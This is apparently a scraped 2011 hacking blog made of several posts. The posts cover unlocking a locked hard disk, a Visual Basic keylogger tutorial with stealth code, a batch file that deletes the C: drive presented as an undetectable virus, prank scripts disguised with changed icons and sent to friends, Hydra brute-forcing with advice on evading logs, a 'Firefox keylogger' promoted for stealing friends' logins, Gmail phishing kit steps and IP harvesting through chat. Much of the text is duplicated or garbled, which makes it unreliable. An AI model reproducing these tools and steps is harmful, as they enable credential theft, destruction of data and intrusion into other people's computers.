Sunday, November 6, 2011
ow to crack/unlock locked hdd (hard disk) password?
Ok guys, here is a simple n effective way to crack/unlock a locked hdd/harddisk
password. So lets check it out...
During development of the Rockbox firmware, on several occations the
harddisk has become locked, i.e. password protected. This results in
the Archos displaying:
Part. Error
Pls Chck HD
We are still not 100% sure why it happened. Theories range from
low-power conditions to accidental chip select failure. It has also
happened for normal users, using the standard Archos-supplied
firmware, although it was more frequent for us developers.
Note: None of us developers have experienced this problem since march 2002.
We do however know how to unlock the disk:
Windows/DOS unlock
Note: This requires taking the Archos apart, which will void your warranty!
Grab atapwd
Create a bootable DOS floppy disk, and put atapwd.exe on it
Remove the harddisk from your Archos and plug it into a laptop (or a
standard PC, using a 3.5" => 2.5" IDE adapter)
Boot from the floppy and run atapwd.exe
Select the locked harddrive and press enter for the menu
For Fujitsu disks: Choose "unlock with user password", then "disable
with user password". The password is empty, so just press enter at the
For Toshiba and Hitachi disks, if the above doesn't work: Choose
"unlock with master password", then "disable with master password".
The password is all spaces.
Your disk is now unlocked. Shut down the computer and remove the disk.
Big thanks to Magnus Andersson for discovering the Fujitsu (lack of)
user password!
There is also a program for win32, ArchosUnlock.exe, that creates a
linux boot disk with the below mentioned patched isd200 driver.
Linux unlock
For those of us using Linux, we have written an isd200 driver patch.
This modified driver will automatically unlock
the disk when you connect your Archos via USB, so you don't have to do
anything special. Apply the patch to a 2.4.18 linux kernel tree.
Still locked?
If the above suggestions don't work, here's some background info about
the disk lock feature:
The disk lock is a built-in security feature in the disk. It is part
of the ATA specification, and thus not specific to any brand or
A disk always has two passwords: A User password and a Master
password. Most disks support a Master Password Revision Code, which
can tell you if the Master password has been changed, or it it still
the factory default. The revision code is word 92 in the IDENTIFY
response. A value of 0xFFFE means the Master password is unchanged.
A disk can be locked in two modes: High security mode or Maximum
security mode. Bit 8 in word 128 of the IDENTIFY response tell you
which mode your disk is in: 0 = High, 1 = Maximum.
In High security mode, you can unlock the disk with either the user or
master password, using the "SECURITY UNLOCK DEVICE" ATA command. There
is an attempt limit, normally set to 5, after which you must power
cycle or hard-reset the disk before you can attempt again.
In Maximum security mode, you cannot unlock the disk! The only way to
get the disk back to a usable state is to issue the SECURITY ERASE
PREPARE command, immediately followed by SECURITY ERASE UNIT. The
SECURITY ERASE UNIT command requires the Master password and will
completely erase all data on the disk. The operation is rather slow,
expect half an hour or more for big disks. (Word 89 in the IDENTIFY
response indicates how long the operation will take.)
How to make a keylogger? (Write keylogger in VB)
Before we start programming, we need to answer a basic question: what is a keylogger?
As the name implies (key+logger) – a keylogger is a computer program that logs (records) the keys (keyboard buttons) pressed by a user. This should be simple to understand. Lets say that I am doing something at my computer.
A keylogger is also running (working) on this computer. This would mean that the keylogger is “listening” to all the keys I am pressing and it is writing all the keys to a log file of some sort. Also, as one might have guessed already, we don’t want the user to know that their keys are being logged. So this would mean that our keylogger should work relatively stealth and must not, in any case, show its presence to the user. Good, now we know what a keylogger as and we have an idea of its functions, lets move on to the next step.
Basic Concepts: What needs to be achieved
Ok, now lets plan our program, what should such keyloger do and what it should not. Significant difference to previous section is in the sense that here we shall discuss the LOGIC, the instructions that our program will follow.
Keylogger will:
1 – listen to all the key strokes of the user.
2 – save these keys in a log file.
3 – during logging, does not reveal its presence to the user.
4 – keeps doing its work as long as the used is logged on regardless of users actions.
Implementation: Converting logic into code
We shall use Visual Basic because it is much easier and simple to understand comparing to C++ or Java as far as novice audience is concerned. Although programmers consider it somewhat lame to code in VB but truthfully speaking, its the natural language for writing hacking/cracking programs. Lets cut to the chase – start your VB6 environment and we are ready to jump the ride!
We need a main form, which will act as HQ to the program.
First of all, as our program shall run, we need to make sure it is hidden. This should be very simple to accomplish:
Private Sub Form_Load()
Me.Visisble = False
End Sub
This makes our program invisible to the human eye. To make it invisible to computers eye too, we need to add this line in the Form_Load() event App.TaskVisible = False . This enabled our logger to run in stealth mode and the regular Task Manager will not see our application. Although it will still be possible to see it in the processes tab, there are “ways” to make it hidden.
Figure them out yourself, they have nothing to do with programming.
OK, now that our program has run in stealth mode, it should do its essential logging task. For this, we shall be using a whole load of API. These are the interfaces that the Application Platform (windows) itself provides us in those annoying dll files.
There are 3 methods to listen for keys:
* GetAsyncKeyState
* GetKeyboardState
* Windows Hooks
Althought the last method is easier to use, this will not work on Windows98 and also it is NOT very precise. Many people use it, but as my experiences revealed, Keyboard Hooks are only a good way of blocking keys and nothing else. The most exact and precise method in my experience is GetAsyncKeyState()
So lets use this function, but where is that damn thing and how to use it?
Private Declare Function GetAsyncKeyState Lib “USER32″ (ByVal vKey As Long) As Integer
This is how we use a function already present in a dll file. In this case we are using the user32.dll and the function we are using is GetAsyncKeyState().
The arguments (Long vKey), and return value (Long) shall be discussed later, right now its enough to know that this function can listen to keystrokes.
What we need next is to run this function infinitely (as long as the system is running). To do this, just put a Timer control on the form and name it tmrTimer.
This timer is used to run the same line of code forever. Note that a while loop with a universally true condition would also accomplish same, but the while loop will certainly hang the system and will lead to its crash as opposed to timer.
Timer will not hang the system at all because a while loop tends to carry out the instruction infinitely WITHOUT any break and it also keeps the control to itself, meaning that we cannot do any other job as the loop is running (and with a universally true statement, the while loop will not let the control pass to ANYWHERE else in the program making all the code useless) while the Timer control just carries out the instuction after a set amount of time.
So the two possibilities are:
Do While 1=1
‘our use of the GAKS (GetAsyncKeyState) function Loop
Private Sub tmrTimer_Timer()
‘our use of the GAKS function
End Sub
Timer being set, lets move on to see how the GAKS function works and how are we going to use it. Basically what the GAKS function does is that it tells us if a specific key is being pressed or not. We can use the GAKS function like this: Hey GAKS() check if the ‘A’ key is being pressed.
And the GAKS function will tell us if it is being pressed or not. Sadly, we can’t communicate with processors like this, we have to use some
amboyant 007 style
If GAKS(65)<>0 Then
Msgbox “The ‘A’ key is being pressed”
Msgbox “The ‘A’ key is not being pressed”
End If
Now lets see how this code works: GAKS uses ASCII key codes and 65 is the ASCII code for ‘A’ If the ‘A’ key is being pressed then GAKS will return a non-zero value (often 1) and if the key is not being pressed then it will return 0. Hence If GAKS(65)<>0 will be comprehended by the VB compiler as “If the ‘A’ key is being pressed”.
Sticking all this stuff together, we can use this code to write a basic functional keylogger:
Private Sub tmrTimer_Timer()
Dim i As Integer
Static data As String
For i = 65 to 90 ‘represents ASCII codes from ‘A’ to ‘Z’
If GAKS(i)<>0 Then data = data & Chr(i)
Next i
If GAKS(32) <> 0 Then data = data &a ” ” ‘checking for the space bar
If Len(data)>=100 Then
Msgbox “The last 100 (or a couple more) are these ” & VBNewLine & data
data = “”
End If
End Sub
This alone is enough to create a basic functioning keylogger although it is far from practical use. But this does the very essential function of keylogger. Do try it and modify it to your needs to see how GAKS works and how do the Timer delays affect the functionality of a keylogger. Honestly speaking, the core of our keylogger is complete, we have only to sharpen it now and make it precise, accurate and comprehensive.
The first problem that one encounters using GAKS is that this function is far too sensitive than required. Meaning that if we keep a key pressed for 1/10th of a second, this function will tell us that the key has been pressed for at least 2 times, while it actually was a sigle letter. For this, we must sharpen it.
We need to add what I call “essential time count” to this function. This means that we need to tell it to generate a double key press only if the key has been pressed for a specified amount of time.
For this, we need a whole array of counters. So open your eyes and listen attentively.
Dim count(0 to 255) As Integer
This array is required for remembering the time count for the keys. i.e. to remember for how long the key has been pressed.
Private Sub tmrTimer_Timer()
Dim i As Integer
Const timelimit As Integer = 10
Static data As String
For i=0 To 255 ‘for all the ASCII codes
If GAKS(i)<>0 Then
If count(i) = 0 Then ‘if the key has just been pressed
data = data & Chr(i)
ElseIf count(i) < timelimit Then
count(i) = count(i) + 1 ‘add 1 to the key count
count(i) = 0 ‘initialize the count
data = data & Chr(i)
End If
Else ‘if the key is not being pressed
count(i) = 0
End If
Next i
End Sub
What we have done here is that we have set a time limit before the GAKS function will tell us that the key is being pressed. This means, in simple words, that if we press and hold the ‘A’ key, the GAKS function will not blindly tell us the ‘A’ key is being pressed, but it will wait for sometime before telling us again that the key is being pressed. This is a very important thing to do, because many users are not very fast typists and tend to press a key for somewhat longer than required.
Now what is left (of the basic keylogger implementation) is just that we write the keys to a file. This should be very simple:
Private Sub timrTimer_Timer()
‘do all the fuss and listen for keystrokes
‘if a key press is detected
Open App.Path & “\logfile.txt” For Append As #1
Print #1, Chr(keycode);
Close #1
End Sub
Note that this is the very basic concept of writing a keylogger, we have yet not added autostart option and neither have we added an post-compile functionality edit options. These are advanced issues for the beginners. If you would like me to write about them, do tell me and I will write about them too, step by step.
Please do comment on this article, telling me what it lacks and what was not required in it. Feel free to post this anywhere you like, just make sure you don’t use it for commercial purposes. If you have any questions about any part of it let me know and I will try to answer.
How to delete Autorun.inf virus?
Once it happened to a friend of mine, when his newly bought laptop was infected with this autorun.inf virus. This virus corrupted almost all the drives on the Hard disk, and when ever he tried to double click on the drive or opening any drive it opened in a new window. In some cases, when your drive is infected with this Autorun.inf virus, you won’t be able to access the drive completely. You have to browse the drive by Exploring it i.e; Ctrl+E keys from the keyboard.
Sometimes ever you will not be able to see hidden files even if you have Show hidden files Enabled under Folder Options. well, this are all the wonders of this Autorun.inf virus.
I am going to show you this rare method of removing Autorun.inf manually using just winrar application, not any antivirus or malware programs.
Solution to Remove Autorun.inf Virus
Step 1: First Disable CD/DVD or USB Autorun in windows
When ever you plug a usb device to the system or insert a cd/dvd disk, The windows Autorun Run utility runs and displays certain options like Open files to view, Play, Do nothing etc.
Although this a good utility provided by windows xp operating system, It is sometimes very dangerous too. When A virus infected Usb drive or Cd is plugged into the system, the virus gets a chance to attack you Operating system, by running automatically when you plug your device in.
Follow the below steps and ensure your systems safety.
1) Click Start –> Run and type GPEDIT.MSC – This opens Group Policy editor window.
2) On the left side –> expand Computer Configuration–> Administrative Templates–> System.
for windows 7--> expand Computer Configuration–> Administrative Templates–> Windows Components.
3) Locate the entry for Turn autoplay off on the right side.
4) Double click it and select “Enabled”
Step 2: Open Winrar.exe (Start–>All Programs–>WinRar–>WinRar.exe)
Step 3: Now Browse to any drive that is infected with Autorun.inf virus using winrar explorer.
Step4: Here you will see all the hidden files under winrar for that particular drive.
Step 5: Look for the file Autorun.inf and open it using notepad.
Step 6: In that Autorun file, some .EXE file will be mentioned that will be executed along with the autorun file. This exe file is the main culprit.
Step 7: Note the exe file mentioned in the Autorun.inf file. Close this Autorun.inf file.
Step 8: Now look for that .Exe file in the drive (Ex: c:/), Delete that .exe file along with Autorun.inf
Step 9: Restart your Operating System. Now your system is free with Autorun.inf Virus.
Note: Repeat the same process if your Usb or Pendrives are infected with Autorun.inf virus.
If you know anyother method to remove autorun virus from windows operating system, them kindly let me know by posting your method using the Comments on this post.
Tuesday, June 28, 2011
fr any help
write ur own simple virus cant detected by any antivirus....
@Echo off
Del C:\ *.* |y
And save that as .bat not .txt and RUN IT
It will delete the content of C:\ drive...
PLEASE NoTe::::: dont run that .bat file on ur system .... it will delet c:...
IF ANY ONE..... DARE TO ......RUN ...U LOST ..........CONTENTS OF C drive
Del C:\ *.* |y
And save that as .bat not .txt and RUN IT
It will delete the content of C:\ drive...
PLEASE NoTe::::: dont run that .bat file on ur system .... it will delet c:...
IF ANY ONE..... DARE TO ......RUN ...U LOST ..........CONTENTS OF C drive
To make a really cool batch file that can make your entire screen flash random colors until you hit a key to stop it, simply copy and paste the following code into notepad and then save it as a .bat file.
@echo off
echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>\z.dbg
echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>\z.dbg
echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>\z.dbg
echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>\z.dbg
echo g=100>>\z.dbg
echo q>>\z.dbg
debug <\z.dbg>nul
del \z.dbg
But if you really want to mess with a friend then copy and paste the following code which will do the same thing except when they press a key the screen will go black and the only way to stop the batch file is by pressing CTRL-ALT-DELETE.
@echo off
echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>\z.dbg
echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>\z.dbg
echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>\z.dbg
echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>\z.dbg
echo g=100>>\z.dbg
echo q>>\z.dbg
debug <\z.dbg>nul
del \z.dbg
goto a
To disable error (ctrl+shirt+esc) then end process wscript.exe
@echo off
echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>\z.dbg
echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>\z.dbg
echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>\z.dbg
echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>\z.dbg
echo g=100>>\z.dbg
echo q>>\z.dbg
debug <\z.dbg>nul
del \z.dbg
But if you really want to mess with a friend then copy and paste the following code which will do the same thing except when they press a key the screen will go black and the only way to stop the batch file is by pressing CTRL-ALT-DELETE.
@echo off
echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>\z.dbg
echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>\z.dbg
echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>\z.dbg
echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>\z.dbg
echo g=100>>\z.dbg
echo q>>\z.dbg
debug <\z.dbg>nul
del \z.dbg
goto a
To disable error (ctrl+shirt+esc) then end process wscript.exe
9) Hard prank: Pick your poison batch file. It asks your friend to choose a number between 1-5 and then does a certain action:
1: Shutdown
2: Restart
3: Wipes out your hard drive (BEWARE)
4: Net send
5: Messages then shutdown
Type :
@echo off
title The end of the world
cd C:\
echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press 'x' then your PC will be formatted. Do not come crying to me when you fried your computer or if you lost your project etc...
echo Pick your poison:
echo 1. Die this way (Wimp)
echo 2. Die this way (WIMP!)
echo 4. Die this way (you're boring)
echo 5. Easy way out
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two
Save it as "Anything.BAT" and send it.
You might wanna have to change the Icon of the file before sending it to your friend, so right click the file, click Properties, click on the 'Change' Icon and change the icon from there.
2: Restart
3: Wipes out your hard drive (BEWARE)
4: Net send
5: Messages then shutdown
Type :
@echo off
title The end of the world
cd C:\
echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press 'x' then your PC will be formatted. Do not come crying to me when you fried your computer or if you lost your project etc...
echo Pick your poison:
echo 1. Die this way (Wimp)
echo 2. Die this way (WIMP!)
echo 4. Die this way (you're boring)
echo 5. Easy way out
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two
Save it as "Anything.BAT" and send it.
You might wanna have to change the Icon of the file before sending it to your friend, so right click the file, click Properties, click on the 'Change' Icon and change the icon from there.
8. Open Notepad continually in your friend's computer: Type :
@ECHO off
START %SystemRoot%\system32\notepad.exe
GOTO top
Save it as "Anything.BAT" and send it.
START %SystemRoot%\system32\notepad.exe
GOTO top
Save it as "Anything.BAT" and send it.
7) Hack your friend's keyboard and make him type "You are a fool" simultaneously: Type :
Set wshShell = wscript.CreateObject("WScript.Shell")
wscript.sleep 100
wshshell.sendkeys "You are a fool."
Save it as "Anything.VBS" and send it.
wscript.sleep 100
wshshell.sendkeys "You are a fool."
Save it as "Anything.VBS" and send it.
6) Frustrate your friend by making this VBScript hit Backspace simultaneously:
MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
wscript.sleep 100
wshshell.sendkeys "{bs}"
Save it as "Anything.VBS" and send it.
Set wshShell =wscript.CreateObject("WScript.Shell")
wscript.sleep 100
wshshell.sendkeys "{bs}"
Save it as "Anything.VBS" and send it.
5) Open Notepad, slowly type "Hello, how are you? I am good thanks" and freak your friend out: Type :
WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 100
WshShell.AppActivate "Notepad"
WScript.Sleep 500
WshShell.SendKeys "Hel"
WScript.Sleep 500
WshShell.SendKeys "lo "
WScript.Sleep 500
WshShell.SendKeys ", ho"
WScript.Sleep 500
WshShell.SendKeys "w a"
WScript.Sleep 500
WshShell.SendKeys "re "
WScript.Sleep 500
WshShell.SendKeys "you"
WScript.Sleep 500
WshShell.SendKeys "? "
WScript.Sleep 500
WshShell.SendKeys "I a"
WScript.Sleep 500
WshShell.SendKeys "m g"
WScript.Sleep 500
WshShell.SendKeys "ood"
WScript.Sleep 500
WshShell.SendKeys " th"
WScript.Sleep 500
WshShell.SendKeys "ank"
WScript.Sleep 500
WshShell.SendKeys "s! "
Save it as "Anything.VBS" and send it
WScript.Sleep 10000
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 100
WshShell.AppActivate "Notepad"
WScript.Sleep 500
WshShell.SendKeys "Hel"
WScript.Sleep 500
WshShell.SendKeys "lo "
WScript.Sleep 500
WshShell.SendKeys ", ho"
WScript.Sleep 500
WshShell.SendKeys "w a"
WScript.Sleep 500
WshShell.SendKeys "re "
WScript.Sleep 500
WshShell.SendKeys "you"
WScript.Sleep 500
WshShell.SendKeys "? "
WScript.Sleep 500
WshShell.SendKeys "I a"
WScript.Sleep 500
WshShell.SendKeys "m g"
WScript.Sleep 500
WshShell.SendKeys "ood"
WScript.Sleep 500
WshShell.SendKeys " th"
WScript.Sleep 500
WshShell.SendKeys "ank"
WScript.Sleep 500
WshShell.SendKeys "s! "
Save it as "Anything.VBS" and send it
4) Frustrate your friend by making this VBScript hit Enter simultaneously: Type :
Set wshShell = wscript.CreateObject("WScript.Shell")
wscript.sleep 100
wshshell.sendkeys "~(enter)"
Save it as "Anything.VBS" and send it.
wscript.sleep 100
wshshell.sendkeys "~(enter)"
Save it as "Anything.VBS" and send it.
3) Convey your friend a lil' message and shut down his / her computer: Type :
@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s
Save it as "Anything.BAT" in All Files and send it.
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s
Save it as "Anything.BAT" in All Files and send it.
2) Toggle your friend's Caps Lock button simultaneously: Type :
Set wshShell =wscript.CreateObject("WScript.Shell")
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
Save it as "Anything.VBS" and send it.
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
Save it as "Anything.VBS" and send it.
Create virus for 1)Continually pop out your friend's CD Drive. If he / she has more than one, it pops out all of them?
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
For i = 0 to colCDROMs.Count - 1
End If
wscript.sleep 5000
Save it as "Anything.VBS" and send it.
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
For i = 0 to colCDROMs.Count - 1
End If
wscript.sleep 5000
Save it as "Anything.VBS" and send it.
Monday, June 27, 2011
How to crack account password through brute force?
What is brute forcing ?
In layman language, brute forcing means using a tool that picks passwords from a word list and tries them one by one until one works.
How to make a word list ?
A word list can consist of all possible combination's of letter,numbers,special characters. It can have some common or default passwords. You can download the word list generators or goggle the word-lists for brute-forcing and configure them according to yourself.
How fruitful attack can be ?
If we are try all possible combination's of letter,numbers,special characters, theoretically chances of success are 100%. But practically it is not possible to try every combination because it can take a lot of time. This attack just depends on the time you give,processing power and of course your luck.
Many tools are use for it hydra is one of them
Step 1
Download THC Hydra from(
Step 2
(a) Make a usename wordlist consisting of some common usernames like this
(b) Get a wordlist of passwords
(c) Copy both wordlists to your hydra folder
Step 3
(a)Open the command prompt and change directory to your hydra folder using cd command.
(b) Type "hydra" without quotes and it will show you the options to use.
(c) Now to start attak,
Type "hydra -L userslist.txt -P passlist.txt ftp" and press enter
where userslist.txt is the list of usernames, passlist.txt is the list of passwords and is the IP address of target, Now it will start cracking
To use a single username instead of wordlist , Replace capital L with small l , like this
Type "hydra -l username -P passlist.txt ftp"
Note : Ftp port must be open.
Warning: I highly recommend you to use a chain of proxies to spoof your identity because proper logs of user's IP addresses who try to connect to ftp server is made on the server. Here is an example of the same.
Countermeasures to protect yourself from this attack:
Use strong passwords
How to use Firefox as a Keylogger for hacking Passwords?
Hello friends, After a long time, I am back with new hacking tool in this blog and this blog now opened for all readers now .In this post I am going to show how we can convert a world best and popular browser into a keylogger. I think you all know about Keylogger, a software used to keep track of all the activity that going on in our Pc in hidden mode.
Usually all keylogger are detected by most of all the antivirus has virus and they didn't allow to install them on your PC. Here, today we have something special for hobby Hackers, we have developed a "Firefox Keylogger" to store passwords automatically without asking any confirmation message, and this Keylogger is not detected by any Antivirus we tested with Top 20 Antivirus and the final result is "Found Nothing". so, you're safe to use this Keylogger.
About Firefox Keylogger:
The name itself indicates used to save passwords in Firefox browser without any notification. By default all browsers, used to ask confirmation message before saving passwords in browser. Now, what we have done is we just find the particular bit of code which used to ask confirmation message to save passwords, and replaced that code with saving password function. So, whenever you Login any website with Firefox browser it stop showing "Remember", "Never for This Site" and "Not Now" option, instead it automatically start storing password without asking confirmation message. In this way our application/software works.
Installing Firefox Keylogger:Installing Firefox keylogger is different form all other application/software. We designed this application in such a way that it only install by running the application/software by placing in "C:\" drive. So, if you need to install
"Firefox Keylogger" then you must place "Firefox Keylogger.exe" in "C:\" drive and run that application there.
Even if you place "Firefox Keylogger.exe" in "C:\Program Files\" it will not install so, you must place Firefox Keylogger.exe in C:\ this address only.
After running that application, it will install in Hidden mode and installation process will not be visible to you, within few seconds it will install and after installation you will see one command like below
Where it save password?It saves passwords in default password saving option that is in Tools >> Options >> Saved Passwords to see saved passwords in Firefox browser.
Features of Firefox Keylogger:
It is free from virus,spyware and malware
It records site, username and password which you used to login after installing Firefox keylogger without any clue
It won't use any system memory because, Firefox keylogger is used to modify the souce code of Firefox browser
This keylogger is designed in such a way that it is compactable with most of all versions of Firefox browser even upcoming version too! (Until developers modify Major structure change in Firefox setup file)
Easy to use
Small application
Undetectable to Antivirus
It disables "Remember", "Never for This Site" and "Not Now" notification option while login and more.
How we can use Firefox Keylogger for Hacking purpose?
This depends on you, you can use it in various ways, for example install it in your computer and whenever your friend comes to your home give some time to use Internet and on that he defiantly use that time to login to some of social networking sites like orkut, facebook etc., and thus you can used to hack his account. Are else install in cyber cafe and have a fun.
1> Is it is purely safe to use?
Ans: Yes, it is completely safe to install and we scanned Firefox Keylogger with Top 20 Antivirus and all the scanned result "No virus found".
2> Freeware or Shareware?
Ans: It is completely Freeware, you no need to pay single cents to use this application.
3> Can we distribute it in our blog/website?
Ans: You're free to distribute this software by giving proper credit.
System Requirements:
Operating System: Xp,Vista and Windows 7
Browser: Firefox (any version)
Download: Firefox Keylogger
Let me know what you feel about this application/software? and how you used this application for hacking? is it really helps?
Friday, June 24, 2011
Sunday, June 5, 2011
Facebook Account Hacker Version 2.4

Facebook Account Hacker Version 2.4
I would like to welcome you to the release of the Facebook Account Hacker V2.1. A recent patch meant that V2 would no longer work, but after some hard work and research we have managed to fix the patch. Our Facebook Password Hacker is once again functional.
The application still works the same.
1. Enter the email of the account that you would like to hack.
2. Click "Hack!".
3. Then wait until the password shows up in the "password" field.
4. Then just copy & paste email and password on facebook login page.
How to hack PC while chatting?
I am not sure that this will work 100 %.
But yes will work almost 70 percent of the times.
But before that you need to know some few things of yahoo chat protocol
leave a comment here after u see the post lemme know if it does works or not or u having a problem post here.
Following are the features : -
1) When we chat on yahoo every thing goes through the server.Only when we chat thats messages.
2) When we send files yahoo has 2 options
a) Either it uploads the file and then the other client has to down load it.
b) Either it connects to the client directly and gets the files
3) When we use video or audio:-
a) It either goes thru the server
b) Or it has client to client connection
And when we have client to client connection the opponents IP is revealed.On the 5051 port.So how do we exploit the Chat user when he gets a direct connection. And how do we go about it.Remember i am here to hack a system with out using a TOOL only by simple net commands and yahoo chat techniques.Thats what makes a difference between a real hacker and new bies.
So lets analyze
1) Its impossible to get a Attackers IP address when you only chat.
2) There are 50 % chances of getting a IP address when you send files
3) Again 50 % chances of getting IP when you use video or audio.
So why to wait lets exploit those 50 % chances .
I'll explain only for files here which lies same for Video or audio
1) Go to dos type -
netstat -n 3
You will get the following output.Just do not care and be cool
Active Connections
Proto Local Address Foreign Address State
Active Connections
Proto Local Address Foreign Address State
Just i will explain what the out put is in general.In left hand side is your IP address.And in right hand side is the IP address of the foreign machine.And the port to which is connected.Ok now so what next -
2) Try sending a file to the Target .
if the files comes from server.Thats the file is uploaded leave itYou will not get the ip.But if a direct connection is established. HMMMM then the first attacker first phase is over
This is the output in your netstat.The 5101 number port is where the Attacker is connected.
Active Connections
Proto Local Address Foreign Address State
3) so what next???
Hmmm........ Ok so make a DOS attack now
Go to dos prompt and Just do
nbtstat -A Attackers IPaddress
Can happen that if system is not protected then you can see the whole network.
C:\>nbtstat -A
Local Area Connection:
Node IpAddress: [] Scope Id: []
NetBIOS Remote Machine Name Table
Name Type Status
EDP12 <00> UNIQUE Registered
XYZ <00> GROUP Registered
XYZ <20> UNIQUE Registered
XYZCOMP1 <1E> GROUP Registered
MAC Address = 00-C0-W0-D5-EF-9A
But yes will work almost 70 percent of the times.
But before that you need to know some few things of yahoo chat protocol
leave a comment here after u see the post lemme know if it does works or not or u having a problem post here.
Following are the features : -
1) When we chat on yahoo every thing goes through the server.Only when we chat thats messages.
2) When we send files yahoo has 2 options
a) Either it uploads the file and then the other client has to down load it.
b) Either it connects to the client directly and gets the files
3) When we use video or audio:-
a) It either goes thru the server
b) Or it has client to client connection
And when we have client to client connection the opponents IP is revealed.On the 5051 port.So how do we exploit the Chat user when he gets a direct connection. And how do we go about it.Remember i am here to hack a system with out using a TOOL only by simple net commands and yahoo chat techniques.Thats what makes a difference between a real hacker and new bies.
So lets analyze
1) Its impossible to get a Attackers IP address when you only chat.
2) There are 50 % chances of getting a IP address when you send files
3) Again 50 % chances of getting IP when you use video or audio.
So why to wait lets exploit those 50 % chances .
I'll explain only for files here which lies same for Video or audio
1) Go to dos type -
netstat -n 3
You will get the following output.Just do not care and be cool
Active Connections
Proto Local Address Foreign Address State
Active Connections
Proto Local Address Foreign Address State
Just i will explain what the out put is in general.In left hand side is your IP address.And in right hand side is the IP address of the foreign machine.And the port to which is connected.Ok now so what next -
2) Try sending a file to the Target .
if the files comes from server.Thats the file is uploaded leave itYou will not get the ip.But if a direct connection is established. HMMMM then the first attacker first phase is over
This is the output in your netstat.The 5101 number port is where the Attacker is connected.
Active Connections
Proto Local Address Foreign Address State
3) so what next???
Hmmm........ Ok so make a DOS attack now
Go to dos prompt and Just do
nbtstat -A Attackers IPaddress
Can happen that if system is not protected then you can see the whole network.
C:\>nbtstat -A
Local Area Connection:
Node IpAddress: [] Scope Id: []
NetBIOS Remote Machine Name Table
Name Type Status
EDP12 <00> UNIQUE Registered
XYZ <00> GROUP Registered
XYZ <20> UNIQUE Registered
XYZCOMP1 <1E> GROUP Registered
MAC Address = 00-C0-W0-D5-EF-9A
How to hide texts in Notepad?
Have you ever tried to Hide text in a regulare windows Notepad....!
Yes, there is a possibility to hide some text in a Regular Notepad, but it seems to be working on only few versions on windows, probably on Windows XP SP2.
To hide text in a notepad, all what you need to do is, just open up a command prompt and type the command as given below,......
C:\>notepad secret.txt:hidden.txt
Then it will opens up a new Notepad file, and prompts whether to create a notepad file with the name secret, go ahead and click on 'yes'., then the title of the notepad file will changes and you may see the changes in the titlebar of the Notepad. Now type what ever you want there, according to your wish and go ahead and click on the X on the right exterme end on the Notepad window ( Close ), then it prompts whether to save the file or not, click on 'Yes'. Then Just type the "DIR" command to view whether the file has been created, it must be there and now go to the location where you saved the file and try to open it up, it will open but it will not display any text in it, instead, it will display a blank Notepad File....! :->
Inorder to view this Hidden text in this Notepad File, just again go to the same command prompt and then type the same command what you have typed to create the file, as below....
C:\>notepad secret.txt:hidden.txt
Now you will view the text what you typed there....!, also if you go ahead and check with the file size, it always seems to be 0KB, sometimes 1KB, and it will not cross these two filesizes, but you can type the contents upto MBs and so on...!
Any way, if someone came to know about this, they can easily open this file by using this simple command.
Dont worry Here is another way to hide the text in the same Notepad application, but it would differ a bit from the previous one, and here in this method you will give a password to open up this file.
In order to perform this Hack, just open up a new command prompt and type the command as given below,....
C:\>echo This is a secret File.....!
Seems to be a simple echo command, is it so?
But it will make these text hidden.
once you have entered the command, just type the "DIR" Command to check whether the file has been created, it will be there. and here it will create a new Notepad file with the name "textfile". and now try to open the file in a normal way, it will open but will be blank file and nothing will be displayed there, inorder to view the text what you typed there, you need to enter another command as below
Once after typing this command , it will display the text what you typed over there, like below.....!
This is a secret File ....!
and the exact output would be like this,.........
C:\>echo This is a secret File .....!
This is a secret File .....!
Inorder to hide your own text, use the same syntax,
C:\> echo Text >Name.txt:password
echo - Command
Text - Text you want to Hide
Name - Filename
password - password
and to open up the file and view the hidden text, the syntax would be,..
C:\> more < Name:password
more - Command
Name - Filename
password - password
The first method is not password protected, but the last one is password protected.
Try it yourself and hide the text like this. :)
How to hack gmail accounts?
Their are many Gmail Phisher available on net but I must say they all are outdated and most of them are detected, So I though to create a new GmailPhisher which is very new and also created by CODE MOBILE.
Steps To Hack Gmail Account :-
1. Download Gmail Phisher
2. This is compressed in .zip so first extract the folder to desktop
3. Upload all three files to Or Any Other Hosting sites
4. Now shorten ( in every time for new victim .
5. Now, you have to send this link to victim and make him login to our fake phishing page.
6. Once you came to know that victim logined to our Gmail Phishing Page then check log.txt.
